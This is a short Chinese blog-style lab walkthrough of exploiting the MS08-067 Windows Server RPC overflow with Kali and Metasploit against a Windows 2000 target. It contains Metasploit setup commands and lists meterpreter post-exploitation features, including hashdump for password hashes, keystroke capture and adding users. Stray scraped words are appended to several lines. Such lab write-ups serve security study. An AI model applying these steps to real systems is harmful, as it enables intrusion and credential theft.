http://www.cnblogs.com/lidong20179210/p/8909569.htmlhtml
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,若是用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能容许远程执行代码。sql
在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证便可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳作法和标准的默认防火墙配置,有助于保护网络资源免受从企业外部发起的攻击,默认状况下能创建空链接。
此实验使用的攻击机是kali,靶机是Win2kServershell
service postgresql start//启动数据库
service metasploit start//启动metasploit数据库
set RHOST 192.168.11.40
set LHOST 192.168.11.35windows
附上对meterpreter的介绍:http://www.xuebuyuan.com/1993953.html
meterpretershell做为渗透模块有不少有用的功能,好比添加一个用户、隐藏一些东西、打开shell、获得用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、获得远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。api
它把截图放在你kali的root路径下了
网络
一样的还能够利用命令ps获取系统当前的进程列表、pwd获取当前的工做目录和用户ID、hashdump获取目标系统的password hash(密码哈希)等,在着不在赘述。post